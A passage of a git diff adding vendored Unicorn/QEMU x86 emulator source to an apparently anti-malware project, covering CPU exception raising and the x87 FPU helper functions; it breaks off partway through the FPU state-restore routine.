License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "qemu/log.h" +#include "sysemu/sysemu.h" +#include "exec/helper-proto.h" + +#include "uc_priv.h" + +#if 0 +#define raise_exception_err(env, a, b) \ + do { \ + qemu_log("raise_exception line=%d\n", __LINE__); \ + (raise_exception_err)(env, a, b); \ + } while (0) +#endif + +void helper_raise_interrupt(CPUX86State *env, int intno, int next_eip_addend) +{ + raise_interrupt(env, intno, 1, 0, next_eip_addend); +} + +void helper_raise_exception(CPUX86State *env, int exception_index) +{ + raise_exception(env, exception_index); +} + +/* + * Check nested exceptions and change to double or triple fault if + * needed. It should only be called, if this is not an interrupt. + * Returns the new exception number. + */ +static int check_exception(CPUX86State *env, int intno, int *error_code) +{ + int first_contributory = env->old_exception == 0 || + (env->old_exception >= 10 && + env->old_exception <= 13); + int second_contributory = intno == 0 || + (intno >= 10 && intno <= 13); + + qemu_log_mask(CPU_LOG_INT, "check_exception old: 0x%x new 0x%x\n", + env->old_exception, intno); + +#if !defined(CONFIG_USER_ONLY) + if (env->old_exception == EXCP08_DBLE) { + if (env->hflags & HF_SVMI_MASK) { + cpu_vmexit(env, SVM_EXIT_SHUTDOWN, 0); /* does not return */ + } + + qemu_log_mask(CPU_LOG_RESET, "Triple fault\n"); + + qemu_system_reset_request(env->uc); + return EXCP_HLT; + } +#endif + + if ((first_contributory && second_contributory) + || (env->old_exception == EXCP0E_PAGE && + (second_contributory || (intno == EXCP0E_PAGE)))) { + intno = EXCP08_DBLE; + *error_code = 0; + } + + if (second_contributory || (intno == EXCP0E_PAGE) || + (intno == EXCP08_DBLE)) { + env->old_exception = intno; + } + + return intno; +} + +/* + * Signal an interruption. It is executed in the main CPU loop. + * is_int is TRUE if coming from the int instruction. next_eip is the + * env->eip value AFTER the interrupt instruction. It is only relevant if + * is_int is TRUE. + */ +static void QEMU_NORETURN raise_interrupt2(CPUX86State *env, int intno, + int is_int, int error_code, + int next_eip_addend) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + if (!is_int) { + cpu_svm_check_intercept_param(env, SVM_EXIT_EXCP_BASE + intno, + error_code); + intno = check_exception(env, intno, &error_code); + } else { + cpu_svm_check_intercept_param(env, SVM_EXIT_SWINT, 0); + } + + cs->exception_index = intno; // qq + env->error_code = error_code; + env->exception_is_int = is_int; + env->exception_next_eip = env->eip + next_eip_addend; + cpu_loop_exit(cs); +} + +/* shortcuts to generate exceptions */ + +void QEMU_NORETURN raise_interrupt(CPUX86State *env, int intno, int is_int, + int error_code, int next_eip_addend) +{ + raise_interrupt2(env, intno, is_int, error_code, next_eip_addend); +} + +void raise_exception_err(CPUX86State *env, int exception_index, + int error_code) +{ + raise_interrupt2(env, exception_index, 0, error_code, 0); +} + +void raise_exception(CPUX86State *env, int exception_index) +{ + raise_interrupt2(env, exception_index, 0, 0, 0); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/fpu_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/fpu_helper.c new file mode 100644 index 0000000..f121175 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/fpu_helper.c @@ -0,0 +1,1317 @@ +/* + * x86 FPU, MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include +#include "cpu.h" +#include "exec/helper-proto.h" +#include "qemu/aes.h" +#include "qemu/host-utils.h" +#include "exec/cpu_ldst.h" + +#define FPU_RC_MASK 0xc00 +#define FPU_RC_NEAR 0x000 +#define FPU_RC_DOWN 0x400 +#define FPU_RC_UP 0x800 +#define FPU_RC_CHOP 0xc00 + +#define MAXTAN 9223372036854775808.0 + +/* the following deal with x86 long double-precision numbers */ +#define MAXEXPD 0x7fff +#define EXPBIAS 16383 +#define EXPD(fp) (fp.l.upper & 0x7fff) +#define SIGND(fp) ((fp.l.upper) & 0x8000) +#define MANTD(fp) (fp.l.lower) +#define BIASEXPONENT(fp) fp.l.upper = (fp.l.upper & ~(0x7fff)) | EXPBIAS + +#define FPUS_IE (1 << 0) +#define FPUS_DE (1 << 1) +#define FPUS_ZE (1 << 2) +#define FPUS_OE (1 << 3) +#define FPUS_UE (1 << 4) +#define FPUS_PE (1 << 5) +#define FPUS_SF (1 << 6) +#define FPUS_SE (1 << 7) +#define FPUS_B (1 << 15) + +#define FPUC_EM 0x3f + +#define floatx80_lg2 make_floatx80(0x3ffd, 0x9a209a84fbcff799LL) +#define floatx80_l2e make_floatx80(0x3fff, 0xb8aa3b295c17f0bcLL) +#define floatx80_l2t make_floatx80(0x4000, 0xd49a784bcd1b8afeLL) + +static inline void fpush(CPUX86State *env) +{ + env->fpstt = (env->fpstt - 1) & 7; + env->fptags[env->fpstt] = 0; /* validate stack entry */ +} + +static inline void fpop(CPUX86State *env) +{ + env->fptags[env->fpstt] = 1; /* invalidate stack entry */ + env->fpstt = (env->fpstt + 1) & 7; +} + +static inline floatx80 helper_fldt(CPUX86State *env, target_ulong ptr) +{ + CPU_LDoubleU temp; + + temp.l.lower = cpu_ldq_data(env, ptr); + temp.l.upper = cpu_lduw_data(env, ptr + 8); + return temp.d; +} + +static inline void helper_fstt(CPUX86State *env, floatx80 f, target_ulong ptr) +{ + CPU_LDoubleU temp; + + temp.d = f; + cpu_stq_data(env, ptr, temp.l.lower); + cpu_stw_data(env, ptr + 8, temp.l.upper); +} + +/* x87 FPU helpers */ + +static inline double floatx80_to_double(CPUX86State *env, floatx80 a) +{ + union { + float64 f64; + double d; + } u; + + u.f64 = floatx80_to_float64(a, &env->fp_status); + return u.d; +} + +static inline floatx80 double_to_floatx80(CPUX86State *env, double a) +{ + union { + float64 f64; + double d; + } u; + + u.d = a; + return float64_to_floatx80(u.f64, &env->fp_status); +} + +static void fpu_set_exception(CPUX86State *env, int mask) +{ + env->fpus |= mask; + if (env->fpus & (~env->fpuc & FPUC_EM)) { + env->fpus |= FPUS_SE | FPUS_B; + } +} + +static inline floatx80 helper_fdiv(CPUX86State *env, floatx80 a, floatx80 b) +{ + if (floatx80_is_zero(b)) { + fpu_set_exception(env, FPUS_ZE); + } + return floatx80_div(a, b, &env->fp_status); +} + +static void fpu_raise_exception(CPUX86State *env) +{ + if (env->cr[0] & CR0_NE_MASK) { + raise_exception(env, EXCP10_COPR); + } +#if !defined(CONFIG_USER_ONLY) + else { + cpu_set_ferr(env); + } +#endif +} + +void helper_flds_FT0(CPUX86State *env, uint32_t val) +{ + union { + float32 f; + uint32_t i; + } u; + + u.i = val; + FT0 = float32_to_floatx80(u.f, &env->fp_status); +} + +void helper_fldl_FT0(CPUX86State *env, uint64_t val) +{ + union { + float64 f; + uint64_t i; + } u; + + u.i = val; + FT0 = float64_to_floatx80(u.f, &env->fp_status); +} + +void helper_fildl_FT0(CPUX86State *env, int32_t val) +{ + FT0 = int32_to_floatx80(val, &env->fp_status); +} + +void helper_flds_ST0(CPUX86State *env, uint32_t val) +{ + int new_fpstt; + union { + float32 f; + uint32_t i; + } u; + + new_fpstt = (env->fpstt - 1) & 7; + u.i = val; + env->fpregs[new_fpstt].d = float32_to_floatx80(u.f, &env->fp_status); + env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +void helper_fldl_ST0(CPUX86State *env, uint64_t val) +{ + int new_fpstt; + union { + float64 f; + uint64_t i; + } u; + + new_fpstt = (env->fpstt - 1) & 7; + u.i = val; + env->fpregs[new_fpstt].d = float64_to_floatx80(u.f, &env->fp_status); + env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +void helper_fildl_ST0(CPUX86State *env, int32_t val) +{ + int new_fpstt; + + new_fpstt = (env->fpstt - 1) & 7; + env->fpregs[new_fpstt].d = int32_to_floatx80(val, &env->fp_status); + env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +void helper_fildll_ST0(CPUX86State *env, int64_t val) +{ + int new_fpstt; + + new_fpstt = (env->fpstt - 1) & 7; + env->fpregs[new_fpstt].d = int64_to_floatx80(val, &env->fp_status); + env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +uint32_t helper_fsts_ST0(CPUX86State *env) +{ + union { + float32 f; + uint32_t i; + } u; + + u.f = floatx80_to_float32(ST0, &env->fp_status); + return u.i; +} + +uint64_t helper_fstl_ST0(CPUX86State *env) +{ + union { + float64 f; + uint64_t i; + } u; + + u.f = floatx80_to_float64(ST0, &env->fp_status); + return u.i; +} + +int32_t helper_fist_ST0(CPUX86State *env) +{ + int32_t val; + + val = floatx80_to_int32(ST0, &env->fp_status); + if (val != (int16_t)val) { + val = -32768; + } + return val; +} + +int32_t helper_fistl_ST0(CPUX86State *env) +{ + int32_t val; + + val = floatx80_to_int32(ST0, &env->fp_status); + return val; +} + +int64_t helper_fistll_ST0(CPUX86State *env) +{ + int64_t val; + + val = floatx80_to_int64(ST0, &env->fp_status); + return val; +} + +int32_t helper_fistt_ST0(CPUX86State *env) +{ + int32_t val; + + val = floatx80_to_int32_round_to_zero(ST0, &env->fp_status); + if (val != (int16_t)val) { + val = -32768; + } + return val; +} + +int32_t helper_fisttl_ST0(CPUX86State *env) +{ + int32_t val; + + val = floatx80_to_int32_round_to_zero(ST0, &env->fp_status); + return val; +} + +int64_t helper_fisttll_ST0(CPUX86State *env) +{ + int64_t val; + + val = floatx80_to_int64_round_to_zero(ST0, &env->fp_status); + return val; +} + +void helper_fldt_ST0(CPUX86State *env, target_ulong ptr) +{ + int new_fpstt; + + new_fpstt = (env->fpstt - 1) & 7; + env->fpregs[new_fpstt].d = helper_fldt(env, ptr); + env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +void helper_fstt_ST0(CPUX86State *env, target_ulong ptr) +{ + helper_fstt(env, ST0, ptr); +} + +void helper_fpush(CPUX86State *env) +{ + fpush(env); +} + +void helper_fpop(CPUX86State *env) +{ + fpop(env); +} + +void helper_fdecstp(CPUX86State *env) +{ + env->fpstt = (env->fpstt - 1) & 7; + env->fpus &= ~0x4700; +} + +void helper_fincstp(CPUX86State *env) +{ + env->fpstt = (env->fpstt + 1) & 7; + env->fpus &= ~0x4700; +} + +/* FPU move */ + +void helper_ffree_STN(CPUX86State *env, int st_index) +{ + env->fptags[(env->fpstt + st_index) & 7] = 1; +} + +void helper_fmov_ST0_FT0(CPUX86State *env) +{ + ST0 = FT0; +} + +void helper_fmov_FT0_STN(CPUX86State *env, int st_index) +{ + FT0 = ST(st_index); +} + +void helper_fmov_ST0_STN(CPUX86State *env, int st_index) +{ + ST0 = ST(st_index); +} + +void helper_fmov_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = ST0; +} + +void helper_fxchg_ST0_STN(CPUX86State *env, int st_index) +{ + floatx80 tmp; + + tmp = ST(st_index); + ST(st_index) = ST0; + ST0 = tmp; +} + +/* FPU operations */ + +static const int fcom_ccval[4] = {0x0100, 0x4000, 0x0000, 0x4500}; + +void helper_fcom_ST0_FT0(CPUX86State *env) +{ + int ret; + + ret = floatx80_compare(ST0, FT0, &env->fp_status); + env->fpus = (env->fpus & ~0x4500) | fcom_ccval[ret + 1]; +} + +void helper_fucom_ST0_FT0(CPUX86State *env) +{ + int ret; + + ret = floatx80_compare_quiet(ST0, FT0, &env->fp_status); + env->fpus = (env->fpus & ~0x4500) | fcom_ccval[ret + 1]; +} + +static const int fcomi_ccval[4] = {CC_C, CC_Z, 0, CC_Z | CC_P | CC_C}; + +void helper_fcomi_ST0_FT0(CPUX86State *env) +{ + int eflags; + int ret; + + ret = floatx80_compare(ST0, FT0, &env->fp_status); + eflags = cpu_cc_compute_all(env, CC_OP); + eflags = (eflags & ~(CC_Z | CC_P | CC_C)) | fcomi_ccval[ret + 1]; + CC_SRC = eflags; +} + +void helper_fucomi_ST0_FT0(CPUX86State *env) +{ + int eflags; + int ret; + + ret = floatx80_compare_quiet(ST0, FT0, &env->fp_status); + eflags = cpu_cc_compute_all(env, CC_OP); + eflags = (eflags & ~(CC_Z | CC_P | CC_C)) | fcomi_ccval[ret + 1]; + CC_SRC = eflags; +} + +void helper_fadd_ST0_FT0(CPUX86State *env) +{ + ST0 = floatx80_add(ST0, FT0, &env->fp_status); +} + +void helper_fmul_ST0_FT0(CPUX86State *env) +{ + ST0 = floatx80_mul(ST0, FT0, &env->fp_status); +} + +void helper_fsub_ST0_FT0(CPUX86State *env) +{ + ST0 = floatx80_sub(ST0, FT0, &env->fp_status); +} + +void helper_fsubr_ST0_FT0(CPUX86State *env) +{ + ST0 = floatx80_sub(FT0, ST0, &env->fp_status); +} + +void helper_fdiv_ST0_FT0(CPUX86State *env) +{ + ST0 = helper_fdiv(env, ST0, FT0); +} + +void helper_fdivr_ST0_FT0(CPUX86State *env) +{ + ST0 = helper_fdiv(env, FT0, ST0); +} + +/* fp operations between STN and ST0 */ + +void helper_fadd_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = floatx80_add(ST(st_index), ST0, &env->fp_status); +} + +void helper_fmul_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = floatx80_mul(ST(st_index), ST0, &env->fp_status); +} + +void helper_fsub_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = floatx80_sub(ST(st_index), ST0, &env->fp_status); +} + +void helper_fsubr_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = floatx80_sub(ST0, ST(st_index), &env->fp_status); +} + +void helper_fdiv_STN_ST0(CPUX86State *env, int st_index) +{ + floatx80 *p; + + p = &ST(st_index); + *p = helper_fdiv(env, *p, ST0); +} + +void helper_fdivr_STN_ST0(CPUX86State *env, int st_index) +{ + floatx80 *p; + + p = &ST(st_index); + *p = helper_fdiv(env, ST0, *p); +} + +/* misc FPU operations */ +void helper_fchs_ST0(CPUX86State *env) +{ + ST0 = floatx80_chs(ST0); +} + +void helper_fabs_ST0(CPUX86State *env) +{ + ST0 = floatx80_abs(ST0); +} + +void helper_fld1_ST0(CPUX86State *env) +{ + //ST0 = floatx80_one; + floatx80 one = { 0x8000000000000000LL, 0x3fff }; + ST0 = one; +} + +void helper_fldl2t_ST0(CPUX86State *env) +{ + //ST0 = floatx80_l2t; + floatx80 l2t = { 0xd49a784bcd1b8afeLL, 0x4000 }; + ST0 = l2t; +} + +void helper_fldl2e_ST0(CPUX86State *env) +{ + //ST0 = floatx80_l2e; + floatx80 l2e = { 0xb8aa3b295c17f0bcLL, 0x3fff }; + ST0 = l2e; +} + +void helper_fldpi_ST0(CPUX86State *env) +{ + //ST0 = floatx80_pi; + floatx80 pi = { 0xc90fdaa22168c235LL, 0x4000 }; + ST0 = pi; +} + +void helper_fldlg2_ST0(CPUX86State *env) +{ + //ST0 = floatx80_lg2; + floatx80 lg2 = { 0x9a209a84fbcff799LL, 0x3ffd }; + ST0 = lg2; +} + +void helper_fldln2_ST0(CPUX86State *env) +{ + //ST0 = floatx80_ln2; + floatx80 ln2 = { 0xb17217f7d1cf79acLL, 0x3ffe }; + ST0 = ln2; +} + +void helper_fldz_ST0(CPUX86State *env) +{ + //ST0 = floatx80_zero; + floatx80 zero = { 0x0000000000000000LL, 0x0000 }; + ST0 = zero; +} + +void helper_fldz_FT0(CPUX86State *env) +{ + //FT0 = floatx80_zero; + floatx80 zero = { 0x0000000000000000LL, 0x0000 }; + ST0 = zero; +} + +uint32_t helper_fnstsw(CPUX86State *env) +{ + return (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; +} + +uint32_t helper_fnstcw(CPUX86State *env) +{ + return env->fpuc; +} + +void update_fp_status(CPUX86State *env) +{ + int rnd_type; + + /* set rounding mode */ + switch (env->fpuc & FPU_RC_MASK) { + default: + case FPU_RC_NEAR: + rnd_type = float_round_nearest_even; + break; + case FPU_RC_DOWN: + rnd_type = float_round_down; + break; + case FPU_RC_UP: + rnd_type = float_round_up; + break; + case FPU_RC_CHOP: + rnd_type = float_round_to_zero; + break; + } + set_float_rounding_mode(rnd_type, &env->fp_status); + switch ((env->fpuc >> 8) & 3) { + case 0: + rnd_type = 32; + break; + case 2: + rnd_type = 64; + break; + case 3: + default: + rnd_type = 80; + break; + } + set_floatx80_rounding_precision(rnd_type, &env->fp_status); +} + +void helper_fldcw(CPUX86State *env, uint32_t val) +{ + cpu_set_fpuc(env, val); +} + +void helper_fclex(CPUX86State *env) +{ + env->fpus &= 0x7f00; +} + +void helper_fwait(CPUX86State *env) +{ + if (env->fpus & FPUS_SE) { + fpu_raise_exception(env); + } +} + +void helper_fninit(CPUX86State *env) +{ + env->fpus = 0; + env->fpstt = 0; + cpu_set_fpuc(env, 0x37f); + env->fptags[0] = 1; + env->fptags[1] = 1; + env->fptags[2] = 1; + env->fptags[3] = 1; + env->fptags[4] = 1; + env->fptags[5] = 1; + env->fptags[6] = 1; + env->fptags[7] = 1; +} + +/* BCD ops */ + +void helper_fbld_ST0(CPUX86State *env, target_ulong ptr) +{ + floatx80 tmp; + uint64_t val; + unsigned int v; + int i; + + val = 0; + for (i = 8; i >= 0; i--) { + v = cpu_ldub_data(env, ptr + i); + val = (val * 100) + ((v >> 4) * 10) + (v & 0xf); + } + tmp = int64_to_floatx80(val, &env->fp_status); + if (cpu_ldub_data(env, ptr + 9) & 0x80) { + floatx80_chs(tmp); + } + fpush(env); + ST0 = tmp; +} + +void helper_fbst_ST0(CPUX86State *env, target_ulong ptr) +{ + int v; + target_ulong mem_ref, mem_end; + int64_t val; + + val = floatx80_to_int64(ST0, &env->fp_status); + mem_ref = ptr; + mem_end = mem_ref + 9; + if (val < 0) { + cpu_stb_data(env, mem_end, 0x80); + if (val != 0x8000000000000000LL) { + val = -val; + } + } else { + cpu_stb_data(env, mem_end, 0x00); + } + while (mem_ref < mem_end) { + if (val == 0) { + break; + } + v = val % 100; + val = val / 100; + v = (int)((unsigned int)(v / 10) << 4) | (v % 10); + cpu_stb_data(env, mem_ref++, v); + } + while (mem_ref < mem_end) { + cpu_stb_data(env, mem_ref++, 0); + } +} + +void helper_f2xm1(CPUX86State *env) +{ + double val = floatx80_to_double(env, ST0); + + val = pow(2.0, val) - 1.0; + ST0 = double_to_floatx80(env, val); +} + +void helper_fyl2x(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if (fptemp > 0.0) { + fptemp = log(fptemp) / log(2.0); /* log2(ST) */ + fptemp *= floatx80_to_double(env, ST1); + ST1 = double_to_floatx80(env, fptemp); + fpop(env); + } else { + env->fpus &= ~0x4700; + env->fpus |= 0x400; + } +} + +void helper_fptan(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { + env->fpus |= 0x400; + } else { + floatx80 one = { 0x8000000000000000LL, 0x3fff }; + fptemp = tan(fptemp); + ST0 = double_to_floatx80(env, fptemp); + fpush(env); + ST0 = one; + env->fpus &= ~0x400; /* C2 <-- 0 */ + /* the above code is for |arg| < 2**52 only */ + } +} + +void helper_fpatan(CPUX86State *env) +{ + double fptemp, fpsrcop; + + fpsrcop = floatx80_to_double(env, ST1); + fptemp = floatx80_to_double(env, ST0); + ST1 = double_to_floatx80(env, atan2(fpsrcop, fptemp)); + fpop(env); +} + +void helper_fxtract(CPUX86State *env) +{ + CPU_LDoubleU temp; + + temp.d = ST0; + + if (floatx80_is_zero(ST0)) { + /* Easy way to generate -inf and raising division by 0 exception */ + floatx80 zero = { 0x0000000000000000LL, 0x0000 }; + floatx80 one = { 0x8000000000000000LL, 0x3fff }; + ST0 = floatx80_div(floatx80_chs(one), zero, + &env->fp_status); + fpush(env); + ST0 = temp.d; + } else { + int expdif; + + expdif = EXPD(temp) - EXPBIAS; + /* DP exponent bias */ + ST0 = int32_to_floatx80(expdif, &env->fp_status); + fpush(env); + BIASEXPONENT(temp); + ST0 = temp.d; + } +} + +void helper_fprem1(CPUX86State *env) +{ + double st0, st1, dblq, fpsrcop, fptemp; + CPU_LDoubleU fpsrcop1, fptemp1; + int expdif; + signed long long int q; + + st0 = floatx80_to_double(env, ST0); + st1 = floatx80_to_double(env, ST1); + + if (isinf(st0) || isnan(st0) || isnan(st1) || (st1 == 0.0)) { + ST0 = double_to_floatx80(env, NAN); /* NaN */ + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + return; + } + + fpsrcop = st0; + fptemp = st1; + fpsrcop1.d = ST0; + fptemp1.d = ST1; + expdif = EXPD(fpsrcop1) - EXPD(fptemp1); + + if (expdif < 0) { + /* optimisation? taken from the AMD docs */ + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + /* ST0 is unchanged */ + return; + } + + if (expdif < 53) { + dblq = fpsrcop / fptemp; + /* round dblq towards nearest integer */ + dblq = rint(dblq); + st0 = fpsrcop - fptemp * dblq; + + /* convert dblq to q by truncating towards zero */ + if (dblq < 0.0) { + q = (signed long long int)(-dblq); + } else { + q = (signed long long int)dblq; + } + + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + /* (C0,C3,C1) <-- (q2,q1,q0) */ + env->fpus |= (q & 0x4) << (8 - 2); /* (C0) <-- q2 */ + env->fpus |= (q & 0x2) << (14 - 1); /* (C3) <-- q1 */ + env->fpus |= (q & 0x1) << (9 - 0); /* (C1) <-- q0 */ + } else { + env->fpus |= 0x400; /* C2 <-- 1 */ + fptemp = pow(2.0, expdif - 50); + fpsrcop = (st0 / st1) / fptemp; + /* fpsrcop = integer obtained by chopping */ + fpsrcop = (fpsrcop < 0.0) ? + -(floor(fabs(fpsrcop))) : floor(fpsrcop); + st0 -= (st1 * fpsrcop * fptemp); + } + ST0 = double_to_floatx80(env, st0); +} + +void helper_fprem(CPUX86State *env) +{ + double st0, st1, dblq, fpsrcop, fptemp; + CPU_LDoubleU fpsrcop1, fptemp1; + int expdif; + signed long long int q; + + st0 = floatx80_to_double(env, ST0); + st1 = floatx80_to_double(env, ST1); + + if (isinf(st0) || isnan(st0) || isnan(st1) || (st1 == 0.0)) { + ST0 = double_to_floatx80(env, NAN); /* NaN */ + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + return; + } + + fpsrcop = st0; + fptemp = st1; + fpsrcop1.d = ST0; + fptemp1.d = ST1; + expdif = EXPD(fpsrcop1) - EXPD(fptemp1); + + if (expdif < 0) { + /* optimisation? taken from the AMD docs */ + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + /* ST0 is unchanged */ + return; + } + + if (expdif < 53) { + dblq = fpsrcop / fptemp; /* ST0 / ST1 */ + /* round dblq towards zero */ + dblq = (dblq < 0.0) ? ceil(dblq) : floor(dblq); + st0 = fpsrcop - fptemp * dblq; /* fpsrcop is ST0 */ + + /* convert dblq to q by truncating towards zero */ + if (dblq < 0.0) { + q = (signed long long int)(-dblq); + } else { + q = (signed long long int)dblq; + } + + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + /* (C0,C3,C1) <-- (q2,q1,q0) */ + env->fpus |= (q & 0x4) << (8 - 2); /* (C0) <-- q2 */ + env->fpus |= (q & 0x2) << (14 - 1); /* (C3) <-- q1 */ + env->fpus |= (q & 0x1) << (9 - 0); /* (C1) <-- q0 */ + } else { + int N = 32 + (expdif % 32); /* as per AMD docs */ + + env->fpus |= 0x400; /* C2 <-- 1 */ + fptemp = pow(2.0, (double)(expdif - N)); + fpsrcop = (st0 / st1) / fptemp; + /* fpsrcop = integer obtained by chopping */ + fpsrcop = (fpsrcop < 0.0) ? + -(floor(fabs(fpsrcop))) : floor(fpsrcop); + st0 -= (st1 * fpsrcop * fptemp); + } + ST0 = double_to_floatx80(env, st0); +} + +void helper_fyl2xp1(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if ((fptemp + 1.0) > 0.0) { + fptemp = log(fptemp + 1.0) / log(2.0); /* log2(ST + 1.0) */ + fptemp *= floatx80_to_double(env, ST1); + ST1 = double_to_floatx80(env, fptemp); + fpop(env); + } else { + env->fpus &= ~0x4700; + env->fpus |= 0x400; + } +} + +void helper_fsqrt(CPUX86State *env) +{ + if (floatx80_is_neg(ST0)) { + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + env->fpus |= 0x400; + } + ST0 = floatx80_sqrt(ST0, &env->fp_status); +} + +void helper_fsincos(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { + env->fpus |= 0x400; + } else { + ST0 = double_to_floatx80(env, sin(fptemp)); + fpush(env); + ST0 = double_to_floatx80(env, cos(fptemp)); + env->fpus &= ~0x400; /* C2 <-- 0 */ + /* the above code is for |arg| < 2**63 only */ + } +} + +void helper_frndint(CPUX86State *env) +{ + ST0 = floatx80_round_to_int(ST0, &env->fp_status); +} + +void helper_fscale(CPUX86State *env) +{ + if (floatx80_is_any_nan(ST1)) { + ST0 = ST1; + } else { + int n = floatx80_to_int32_round_to_zero(ST1, &env->fp_status); + ST0 = floatx80_scalbn(ST0, n, &env->fp_status); + } +} + +void helper_fsin(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { + env->fpus |= 0x400; + } else { + ST0 = double_to_floatx80(env, sin(fptemp)); + env->fpus &= ~0x400; /* C2 <-- 0 */ + /* the above code is for |arg| < 2**53 only */ + } +} + +void helper_fcos(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { + env->fpus |= 0x400; + } else { + ST0 = double_to_floatx80(env, cos(fptemp)); + env->fpus &= ~0x400; /* C2 <-- 0 */ + /* the above code is for |arg| < 2**63 only */ + } +} + +void helper_fxam_ST0(CPUX86State *env) +{ + CPU_LDoubleU temp; + int expdif; + + temp.d = ST0; + + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + if (SIGND(temp)) { + env->fpus |= 0x200; /* C1 <-- 1 */ + } + + /* XXX: test fptags too */ + expdif = EXPD(temp); + if (expdif == MAXEXPD) { + if (MANTD(temp) == 0x8000000000000000ULL) { + env->fpus |= 0x500; /* Infinity */ + } else { + env->fpus |= 0x100; /* NaN */ + } + } else if (expdif == 0) { + if (MANTD(temp) == 0) { + env->fpus |= 0x4000; /* Zero */ + } else { + env->fpus |= 0x4400; /* Denormal */ + } + } else { + env->fpus |= 0x400; + } +} + +void helper_fstenv(CPUX86State *env, target_ulong ptr, int data32) +{ + int fpus, fptag, exp, i; + uint64_t mant; + CPU_LDoubleU tmp; + + fpus = (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; + fptag = 0; + for (i = 7; i >= 0; i--) { + fptag <<= 2; + if (env->fptags[i]) { + fptag |= 3; + } else { + tmp.d = env->fpregs[i].d; + exp = EXPD(tmp); + mant = MANTD(tmp); + if (exp == 0 && mant == 0) { + /* zero */ + fptag |= 1; + } else if (exp == 0 || exp == MAXEXPD + || (mant & (1ULL << 63)) == 0) { + /* NaNs, infinity, denormal */ + fptag |= 2; + } + } + } + + if (data32) { + /* 32 bit */ + cpu_stl_data(env, ptr, env->fpuc); + cpu_stl_data(env, ptr + 4, fpus); + cpu_stl_data(env, ptr + 8, fptag); + cpu_stl_data(env, ptr + 12, (uint32_t)env->fpip); /* fpip */ + cpu_stl_data(env, ptr + 16, 0); /* fpcs */ + cpu_stl_data(env, ptr + 20, 0); /* fpoo */ + cpu_stl_data(env, ptr + 24, 0); /* fpos */ + } else { + /* 16 bit */ + cpu_stw_data(env, ptr, env->fpuc); + cpu_stw_data(env, ptr + 2, fpus); + cpu_stw_data(env, ptr + 4, fptag); + cpu_stw_data(env, ptr + 6, (uint32_t)env->fpip); + cpu_stw_data(env, ptr + 8, 0); + cpu_stw_data(env, ptr + 10, 0); + cpu_stw_data(env, ptr + 12, 0); + } + +} + +void helper_fldenv(CPUX86State *env, target_ulong ptr, int data32) +{ + int i, fpus, fptag; + + if (data32) { + cpu_set_fpuc(env, cpu_lduw_data(env, ptr)); + fpus = cpu_lduw_data(env, ptr + 4); + fptag = cpu_lduw_data(env, ptr + 8); + } else { + cpu_set_fpuc(env, cpu_lduw_data(env, ptr)); + fpus = cpu_lduw_data(env, ptr + 2); + fptag = cpu_lduw_data(env, ptr + 4); + } + env->fpstt = (fpus >> 11) & 7; + env->fpus = fpus & ~0x3800; + for (i = 0; i < 8; i++) { + env->fptags[i] = ((fptag & 3) == 3); + fptag >>= 2; + } +} + +void helper_fsave(CPUX86State *env, target_ulong ptr, int data32) +{ + floatx80 tmp; + int i; + + helper_fstenv(env, ptr, data32); + + ptr += (14 << data32); + for (i = 0; i < 8; i++) { + tmp = ST(i); + helper_fstt(env, tmp, ptr); + ptr += 10; + } + + /* fninit */ + env->fpus = 0; + env->fpstt = 0; + cpu_set_fpuc(env, 0x37f); + env->fptags[0] = 1; + env->fptags[1] = 1; + env->fptags[2] = 1; + env->fptags[3] = 1; + env->fptags[4] = 1; + env->fptags[5] = 1; + env->fptags[6] = 1; + env->fptags[7] = 1; +} + +void helper_frstor(CPUX86State *env, target_ulong ptr, int data32) +{ + floatx80 